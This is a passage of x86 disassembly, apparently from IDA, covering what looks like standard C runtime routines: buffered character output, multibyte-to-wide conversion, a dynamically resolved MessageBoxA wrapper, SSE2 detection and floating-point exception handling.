; sub_40F29F+CE�j ...
mov eax, ebp
loc_40F357: ; CODE XREF: sub_40F29F+11C�j
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40F35C: ; CODE XREF: sub_40F29F+F�j
; sub_40F29F+9A�j
mov ebx, [esp+10h+arg_0]
cmp ebx, ebp
jz short loc_40F355
mov eax, [esi+0Ch]
test al, 1
jnz short loc_40F373
test al, al
jns short loc_40F355
test al, 2
jnz short loc_40F355
loc_40F373: ; CODE XREF: sub_40F29F+CA�j
xor edi, edi
cmp [esi+8], edi
jnz short loc_40F381
push esi
call sub_40D4FC
pop ecx
loc_40F381: ; CODE XREF: sub_40F29F+D9�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_40F390
cmp [esi+4], edi
jnz short loc_40F355
inc eax
mov [esi], eax
loc_40F390: ; CODE XREF: sub_40F29F+E7�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_40F3A3
cmp [eax], bl
jz short loc_40F3A5
inc eax
mov [esi], eax
jmp short loc_40F355
; ---------------------------------------------------------------------------
loc_40F3A3: ; CODE XREF: sub_40F29F+F9�j
mov [eax], bl
loc_40F3A5: ; CODE XREF: sub_40F29F+FD�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_40F357
sub_40F29F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3BD proc near ; CODE XREF: sub_408E67+6FF�p
; sub_40F4D0+E�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_40F3E1
cmp [ebp+arg_8], ebx
jz short loc_40F3E1
cmp [esi], bl
jnz short loc_40F3E7
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F3E1
mov [eax], bx
loc_40F3E1: ; CODE XREF: sub_40F3BD+F�j
; sub_40F3BD+14�j ...
xor eax, eax
loc_40F3E3: ; CODE XREF: sub_40F3BD+5A�j
; sub_40F3BD+BB�j ...
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40F3E7: ; CODE XREF: sub_40F3BD+18�j
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_40F419
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F408
movzx cx, byte ptr [esi]
mov [eax], cx
loc_40F408: ; CODE XREF: sub_40F3BD+42�j
; sub_40F3BD+10B�j
cmp [ebp+var_4], bl
jz short loc_40F414
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F414: ; CODE XREF: sub_40F3BD+4E�j
xor eax, eax
inc eax
jmp short loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F419: ; CODE XREF: sub_40F3BD+3B�j
lea eax, [ebp+var_10]
push eax
movzx eax, byte ptr [esi]
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40F4A9
mov eax, [ebp+var_10]
mov ecx, [eax+0ACh]
cmp ecx, 1
jle short loc_40F45F
cmp [ebp+arg_8], ecx
jl short loc_40F45F
xor edx, edx
cmp [ebp+arg_0], ebx
setnz dl
push edx
push [ebp+arg_0]
push ecx
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0 ; MultiByteToWideChar
test eax, eax
mov eax, [ebp+var_10]
jnz short loc_40F46F
loc_40F45F: ; CODE XREF: sub_40F3BD+7B�j
; sub_40F3BD+80�j
mov ecx, [ebp+arg_8]
cmp ecx, [eax+0ACh]
jb short loc_40F48A
cmp [esi+1], bl
jz short loc_40F48A
loc_40F46F: ; CODE XREF: sub_40F3BD+A0�j
cmp [ebp+var_4], bl
mov eax, [eax+0ACh]
jz loc_40F3E3
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F48A: ; CODE XREF: sub_40F3BD+AB�j
; sub_40F3BD+B0�j ...
call sub_4057D3
mov dword ptr [eax], 2Ah
cmp [ebp+var_4], bl
jz short loc_40F4A1
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F4A1: ; CODE XREF: sub_40F3BD+DB�j
or eax, 0FFFFFFFFh
jmp loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F4A9: ; CODE XREF: sub_40F3BD+6D�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
mov eax, [ebp+var_10]
push 1
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0 ; MultiByteToWideChar
test eax, eax
jnz loc_40F408
jmp short loc_40F48A
sub_40F3BD endp
; =============== S U B R O U T I N E =======================================
sub_40F4D0 proc near ; CODE XREF: sub_40CE5A+18E�p
; sub_40CE5A+1BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40F3BD
add esp, 10h
retn
sub_40F4D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F4F0 proc near ; CODE XREF: sub_408E67+9CF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_40F509
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_40F509: ; CODE XREF: sub_40F4F0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_40F4F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F524 proc near ; CODE XREF: sub_409AB4+15D�p
var_30 = dword ptr -30h
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_40518A
xor ebx, ebx
cmp dword_426488, ebx
mov [ebp+var_10], eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
jnz loc_40F5F9
push offset aUser32_dll ; "USER32.DLL"
call ds:dword_41D0E8 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jnz short loc_40F564
loc_40F55D: ; CODE XREF: sub_40F524+50�j
xor eax, eax
jmp loc_40F6BD
; ---------------------------------------------------------------------------
loc_40F564: ; CODE XREF: sub_40F524+37�j
mov esi, ds:dword_41D0EC
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
jz short loc_40F55D
push eax
call sub_405127
mov [esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
push edi
mov dword_426488, eax
call esi ; GetProcAddress
push eax
call sub_405127
mov [esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_42648C, eax
call esi ; GetProcAddress
push eax
call sub_405127
mov dword_426490, eax
lea eax, [ebp+var_8]
push eax
call sub_407906
test eax, eax
pop ecx
pop ecx
jz short loc_40F5C7
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40F5C7: ; CODE XREF: sub_40F524+94�j
cmp [ebp+var_8], 2
jnz short loc_40F5F9
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
push eax
call sub_405127
cmp eax, ebx
pop ecx
mov dword_426498, eax
jz short loc_40F5F9
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
push eax
call sub_405127
pop ecx
mov dword_426494, eax
loc_40F5F9: ; CODE XREF: sub_40F524+22�j
; sub_40F524+A7�j ...
mov eax, dword_426494
mov esi, [ebp+var_10]
cmp eax, esi
jz short loc_40F672
cmp dword_426498, esi
jz short loc_40F672
push eax
call sub_405193
pop ecx
call eax
cmp eax, ebx
jz short loc_40F63F
lea ecx, [ebp+var_14]
push ecx
push 0Ch
lea ecx, [ebp+var_20]
push ecx
push 1
push eax
push dword_426498
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_40F63F
test [ebp+var_18], 1
jnz short loc_40F672
loc_40F63F: ; CODE XREF: sub_40F524+F4�j
; sub_40F524+113�j
lea eax, [ebp+var_C]
push eax
call sub_40793D
test eax, eax
pop ecx
jz short loc_40F65A
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40F65A: ; CODE XREF: sub_40F524+127�j
cmp [ebp+var_C], 4
jb short loc_40F669
or [ebp+arg_8], 200000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
loc_40F669: ; CODE XREF: sub_40F524+13A�j
or [ebp+arg_8], 40000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
loc_40F672: ; CODE XREF: sub_40F524+DF�j
; sub_40F524+E7�j ...
mov eax, dword_42648C
cmp eax, esi
jz short loc_40F6A3
push eax
call sub_405193
pop ecx
call eax
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40F6A3
mov eax, dword_426490
cmp eax, esi
jz short loc_40F6A3
push [ebp+var_4]
push eax
call sub_405193
pop ecx
call eax
mov [ebp+var_4], eax
loc_40F6A3: ; CODE XREF: sub_40F524+143�j
; sub_40F524+14C�j ...
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_4]
push dword_426488
call sub_405193
pop ecx
call eax
loc_40F6BD: ; CODE XREF: sub_40F524+3B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F524 endp
; =============== S U B R O U T I N E =======================================
sub_40F6C2 proc near ; CODE XREF: sub_409AB4+27�p
; sub_409AB4+38�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jl short loc_40F6EB
cmp ecx, 2
jle short loc_40F6DE
cmp ecx, 3
jnz short loc_40F6EB
mov eax, dword_425A9C
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F6DE: ; CODE XREF: sub_40F6C2+E�j
mov eax, dword_425A9C
mov dword_425A9C, ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F6EB: ; CODE XREF: sub_40F6C2+9�j
; sub_40F6C2+13�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
sub_40F6C2 endp
; =============== S U B R O U T I N E =======================================
sub_40F708 proc near ; CODE XREF: sub_40FD56+5F�p
; DATA XREF: sub_40A42B:loc_40A46D�o
xor eax, eax
retn
sub_40F708 endp
; =============== S U B R O U T I N E =======================================
sub_40F70B proc near ; CODE XREF: sub_40F76B�p
mov eax, offset sub_41134A
mov off_423F80, eax
mov off_423F84, offset sub_410A46
mov off_423F88, offset sub_410A04
mov off_423F8C, offset sub_410A38
mov off_423F90, offset word_4109AE
mov off_423F94, eax
mov off_423F98, offset sub_4112C4
mov off_423F9C, offset sub_4109C4
mov off_423FA0, offset sub_41092E
mov off_423FA4, offset sub_4108BD
retn
sub_40F70B endp
; =============== S U B R O U T I N E =======================================
sub_40F76B proc near ; CODE XREF: sub_407979+1C�p
; DATA XREF: .rdata:off_41ED94�o
arg_0 = dword ptr 4
call sub_40F70B
call sub_4113D0
cmp [esp+arg_0], 0
mov dword_4264A0, eax
jz short loc_40F786
call sub_41136B
loc_40F786: ; CODE XREF: sub_40F76B+14�j
fnclex
retn
sub_40F76B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F789 proc near ; CODE XREF: sub_40F7D9+4D�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_4218E8
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
mov [ebp+var_1C], 1
jmp short loc_40F7C9
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_40F7BE
cmp eax, 0C000001Dh
jz short loc_40F7BE
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40F7BE: ; CODE XREF: sub_40F789+29�j
; sub_40F789+30�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and [ebp+var_1C], 0
loc_40F7C9: ; CODE XREF: sub_40F789+1B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40F789 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F7D9 proc near ; CODE XREF: sub_40A6DB+7�p sub_40F839�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
xor eax, eax
push ebx
mov [ebp+var_4], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
push ebx
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_40F81C
push ecx
popf
xor eax, eax
cpuid
mov [ebp+var_C], eax
mov [ebp+var_18], ebx
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, 1
cpuid
mov [ebp+var_4], edx
mov [ebp+var_8], eax
loc_40F81C: ; CODE XREF: sub_40F7D9+22�j
pop ebx
test [ebp+var_4], 4000000h
jz short loc_40F834
call sub_40F789
test eax, eax
jz short loc_40F834
xor eax, eax
inc eax
jmp short loc_40F836
; ---------------------------------------------------------------------------
loc_40F834: ; CODE XREF: sub_40F7D9+4B�j
; sub_40F7D9+54�j
xor eax, eax
loc_40F836: ; CODE XREF: sub_40F7D9+59�j
pop ebx
leave
retn
sub_40F7D9 endp
; =============== S U B R O U T I N E =======================================
sub_40F839 proc near ; DATA XREF: .rdata:0041D2D0�o
call sub_40F7D9
mov dword_433C7C, eax
xor eax, eax
retn
sub_40F839 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F846 proc near ; CODE XREF: sub_40FE47+4A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov cl, byte ptr [ebp+arg_8]
push ebx
push esi
push edi
xor edi, edi
mov [eax+4], edi
mov eax, [ebp+arg_0]
xor ebx, ebx
mov [eax+8], edi
mov eax, [ebp+arg_0]
inc ebx
test cl, 10h
mov [eax+0Ch], edi
jz short loc_40F878
mov eax, [ebp+arg_0]
or [eax+4], ebx
mov [ebp+arg_8], 0C000008Fh
loc_40F878: ; CODE XREF: sub_40F846+23�j
test cl, 2
jz short loc_40F88B
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 2
mov [ebp+arg_8], 0C0000093h
loc_40F88B: ; CODE XREF: sub_40F846+35�j
test cl, bl
jz short loc_40F89D
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 4
mov [ebp+arg_8], 0C0000091h
loc_40F89D: ; CODE XREF: sub_40F846+47�j
test cl, 4
jz short loc_40F8B0
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
mov [ebp+arg_8], 0C000008Eh
loc_40F8B0: ; CODE XREF: sub_40F846+5A�j
test cl, 8
jz short loc_40F8C3
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 10h
mov [ebp+arg_8], 0C0000090h
loc_40F8C3: ; CODE XREF: sub_40F846+6D�j
mov esi, [ebp+arg_4]
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 4
not ecx
xor ecx, [eax+8]
and ecx, 10h
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
add ecx, ecx
not ecx
xor ecx, [eax+8]
and ecx, 8
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 1
not ecx
xor ecx, [eax+8]
and ecx, 4
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 3
not ecx
xor ecx, [eax+8]
and ecx, 2
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 5
not ecx
xor ecx, [eax+8]
and ecx, ebx
xor [eax+8], ecx
call sub_410046
test al, bl
jz short loc_40F932
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_40F932: ; CODE XREF: sub_40F846+E3�j
test al, 4
jz short loc_40F93D
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_40F93D: ; CODE XREF: sub_40F846+EE�j
test al, 8
jz short loc_40F948
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_40F948: ; CODE XREF: sub_40F846+F9�j
test al, 10h
jz short loc_40F953
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 2
loc_40F953: ; CODE XREF: sub_40F846+104�j
test al, 20h
jz short loc_40F95D
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_40F95D: ; CODE XREF: sub_40F846+10F�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_40F99D
cmp eax, 400h
jz short loc_40F991
cmp eax, 800h
jz short loc_40F982
cmp eax, ecx
jnz short loc_40F9A3
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F982: ; CODE XREF: sub_40F846+12E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, 2
loc_40F98D: ; CODE XREF: sub_40F846+155�j
mov [eax], ecx
jmp short loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F991: ; CODE XREF: sub_40F846+127�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
jmp short loc_40F98D
; ---------------------------------------------------------------------------
loc_40F99D: ; CODE XREF: sub_40F846+120�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_40F9A3: ; CODE XREF: sub_40F846+132�j
; sub_40F846+13A�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_40F9CE
cmp eax, 200h
jz short loc_40F9C1
cmp eax, ecx
jnz short loc_40F9DB
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_40F9DB
; ---------------------------------------------------------------------------
loc_40F9C1: ; CODE XREF: sub_40F846+16D�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_40F9D9
; ---------------------------------------------------------------------------
loc_40F9CE: ; CODE XREF: sub_40F846+166�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_40F9D9: ; CODE XREF: sub_40F846+186�j
mov [eax], ecx
loc_40F9DB: ; CODE XREF: sub_40F846+171�j
; sub_40F846+179�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
shl ecx, 5
xor ecx, [eax]
and ecx, 1FFE0h
xor [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
cmp [ebp+arg_18], edi
mov eax, [ebp+arg_0]
mov edi, [ebp+arg_14]
jz short loc_40FA25
and dword ptr [eax+20h], 0FFFFFFE1h
mov eax, [ebp+arg_10]
fld dword ptr [eax]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
and dword ptr [eax+60h], 0FFFFFFE1h
fld dword ptr [edi]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+50h]
jmp short loc_40FA59
; ---------------------------------------------------------------------------
loc_40FA25: ; CODE XREF: sub_40F846+1B7�j
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+60h], ecx
fld qword ptr [edi]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+50h]
loc_40FA59: ; CODE XREF: sub_40F846+1DD�j
call sub_410051
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_41D1AC ; RaiseException
mov ecx, [ebp+arg_0]
test byte ptr [ecx+8], 10h
jz short loc_40FA7A
and dword ptr [esi], 0FFFFFFFEh
loc_40FA7A: ; CODE XREF: sub_40F846+22F�j
test byte ptr [ecx+8], 8
jz short loc_40FA83
and dword ptr [esi], 0FFFFFFFBh
loc_40FA83: ; CODE XREF: sub_40F846+238�j
test byte ptr [ecx+8], 4
jz short loc_40FA8C
and dword ptr [esi], 0FFFFFFF7h
loc_40FA8C: ; CODE XREF: sub_40F846+241�j
test byte ptr [ecx+8], 2
jz short loc_40FA95
and dword ptr [esi], 0FFFFFFEFh
loc_40FA95: ; CODE XREF: sub_40F846+24A�j
test [ecx+8], bl
jz short loc_40FA9D
and dword ptr [esi], 0FFFFFFDFh
loc_40FA9D: ; CODE XREF: sub_40F846+252�j
mov eax, [ecx]
and eax, 3
xor ebx, ebx
sub eax, ebx
mov edx, 0FFFFF3FFh
jz short loc_40FADC
dec eax
jz short loc_40FACE
dec eax
jz short loc_40FABE
dec eax
jnz short loc_40FADE
or dword ptr [esi], 0C00h
jmp short loc_40FADE
; ---------------------------------------------------------------------------
loc_40FABE: ; CODE XREF: sub_40F846+26B�j
mov eax, [esi]
and eax, 0FFFFFBFFh
or eax, 800h
loc_40FACA: ; CODE XREF: sub_40F846+294�j
mov [esi], eax
jmp short loc_40FADE
; ---------------------------------------------------------------------------
loc_40FACE: ; CODE XREF: sub_40F846+268�j
mov eax, [esi]
and eax, 0FFFFF7FFh
or eax, 400h
jmp short loc_40FACA
; ---------------------------------------------------------------------------
loc_40FADC: ; CODE XREF: sub_40F846+265�j
and [esi], edx
loc_40FADE: ; CODE XREF: sub_40F846+26E�j
; sub_40F846+276�j ...
mov eax, [ecx]
shr eax, 2
and eax, 7
sub eax, ebx
jz short loc_40FAFF
dec eax
jz short loc_40FAF4
dec eax
jnz short loc_40FB0A
and [esi], edx
jmp short loc_40FB0A
; ---------------------------------------------------------------------------
loc_40FAF4: ; CODE XREF: sub_40F846+2A5�j
mov eax, [esi]
and eax, edx
or eax, 200h
jmp short loc_40FB08
; ---------------------------------------------------------------------------
loc_40FAFF: ; CODE XREF: sub_40F846+2A2�j
mov eax, [esi]
and eax, edx
or eax, 300h
loc_40FB08: ; CODE XREF: sub_40F846+2B7�j
mov [esi], eax
loc_40FB0A: ; CODE XREF: sub_40F846+2A8�j
; sub_40F846+2AC�j
cmp [ebp+arg_18], ebx
jz short loc_40FB16
fld dword ptr [ecx+50h]
fstp dword ptr [edi]
jmp short loc_40FB1B
; ---------------------------------------------------------------------------
loc_40FB16: ; CODE XREF: sub_40F846+2C7�j
fld qword ptr [ecx+50h]
fstp qword ptr [edi]
loc_40FB1B: ; CODE XREF: sub_40F846+2CE�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40F846 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB20 proc near ; CODE XREF: sub_40FE47+21�p
var_28 = qword ptr -28h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
mov esi, eax
and esi, 1Fh
inc ebx
test al, 8
mov [ebp+var_4], esi
jz short loc_40FB4E
test byte ptr [ebp+arg_8], bl
jz short loc_40FB4E
push ebx
call sub_410084
pop ecx
and esi, 0FFFFFFF7h
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FB4E: ; CODE XREF: sub_40FB20+18�j
; sub_40FB20+1D�j
test al, 4
jz short loc_40FB68
test byte ptr [ebp+arg_8], 4
jz short loc_40FB68
push 4
call sub_410084
pop ecx
and esi, 0FFFFFFFBh
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FB68: ; CODE XREF: sub_40FB20+30�j
; sub_40FB20+36�j
test al, bl
jz loc_40FC0A
test byte ptr [ebp+arg_8], 8
jz loc_40FC0A
push 8
call sub_410084
mov eax, [ebp+arg_8]
pop ecx
mov ecx, 0C00h
and eax, ecx
jz short loc_40FBE2
cmp eax, 400h
jz short loc_40FBCC
cmp eax, 800h
jz short loc_40FBB6
cmp eax, ecx
jnz short loc_40FC02
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
fld dbl_4240C8
test ah, 5
jnp short loc_40FC00
jmp short loc_40FBFE
; ---------------------------------------------------------------------------
loc_40FBB6: ; CODE XREF: sub_40FB20+7A�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jnp short loc_40FBF0
fld dbl_4240C8
jmp short loc_40FBFE
; ---------------------------------------------------------------------------
loc_40FBCC: ; CODE XREF: sub_40FB20+73�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FBF8
fld dbl_4240C8
jmp short loc_40FC00
; ---------------------------------------------------------------------------
loc_40FBE2: ; CODE XREF: sub_40FB20+6C�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FBF8
loc_40FBF0: ; CODE XREF: sub_40FB20+A2�j
fld dbl_4240B8
jmp short loc_40FC00
; ---------------------------------------------------------------------------
loc_40FBF8: ; CODE XREF: sub_40FB20+B8�j
; sub_40FB20+CE�j
fld dbl_4240B8
loc_40FBFE: ; CODE XREF: sub_40FB20+94�j
; sub_40FB20+AA�j
fchs
loc_40FC00: ; CODE XREF: sub_40FB20+92�j
; sub_40FB20+C0�j ...
fstp qword ptr [ecx]
loc_40FC02: ; CODE XREF: sub_40FB20+7E�j
and esi, 0FFFFFFFEh
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FC0A: ; CODE XREF: sub_40FB20+4A�j
; sub_40FB20+54�j
test al, 2
jz loc_40FCDF
test byte ptr [ebp+arg_8], 10h
jz loc_40FCDF
xor esi, esi
test al, 10h
jz short loc_40FC24
mov esi, ebx
loc_40FC24: ; CODE XREF: sub_40FB20+100�j
fldz
push edi
mov edi, [ebp+arg_4]
fcomp qword ptr [edi]
fnstsw ax
test ah, 44h
jnp loc_40FCC9
fld qword ptr [edi]
lea eax, [ebp+var_8]
push eax ; int
push ecx
push ecx ; double
fstp [esp+28h+var_28]
call sub_40FF97
mov ecx, [ebp+var_8]
fstp [ebp+var_10]
add ecx, 0FFFFFA00h
add esp, 0Ch
cmp ecx, 0FFFFFBCEh
jge short loc_40FC6B
fld [ebp+var_10]
mov esi, ebx
fmul ds:dbl_41EE18
jmp short loc_40FCBF
; ---------------------------------------------------------------------------
loc_40FC6B: ; CODE XREF: sub_40FB20+13C�j
fldz
fcomp [ebp+var_10]
fnstsw ax
test ah, 41h
jnz short loc_40FC7B
mov edx, ebx
jmp short loc_40FC7D
; ---------------------------------------------------------------------------
loc_40FC7B: ; CODE XREF: sub_40FB20+155�j
xor edx, edx
loc_40FC7D: ; CODE XREF: sub_40FB20+159�j
movzx eax, byte ptr [ebp+var_10+6]
and eax, 0Fh
or eax, 10h
mov word ptr [ebp+var_10+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_40FCB6
sub eax, ecx
loc_40FC96: ; CODE XREF: sub_40FB20+194�j
test byte ptr [ebp+var_10], bl
jz short loc_40FCA1
test esi, esi
jnz short loc_40FCA1
mov esi, ebx
loc_40FCA1: ; CODE XREF: sub_40FB20+179�j
; sub_40FB20+17D�j
shr dword ptr [ebp+var_10], 1
test byte ptr [ebp+var_10+4], bl
jz short loc_40FCB0
or dword ptr [ebp+var_10], 80000000h
loc_40FCB0: ; CODE XREF: sub_40FB20+187�j
shr dword ptr [ebp+var_10+4], 1
dec eax
jnz short loc_40FC96
loc_40FCB6: ; CODE XREF: sub_40FB20+172�j
test edx, edx
jz short loc_40FCC2
fld [ebp+var_10]
fchs
loc_40FCBF: ; CODE XREF: sub_40FB20+149�j
fstp [ebp+var_10]
loc_40FCC2: ; CODE XREF: sub_40FB20+198�j
fld [ebp+var_10]
fstp qword ptr [edi]
jmp short loc_40FCCB
; ---------------------------------------------------------------------------
loc_40FCC9: ; CODE XREF: sub_40FB20+111�j
mov esi, ebx
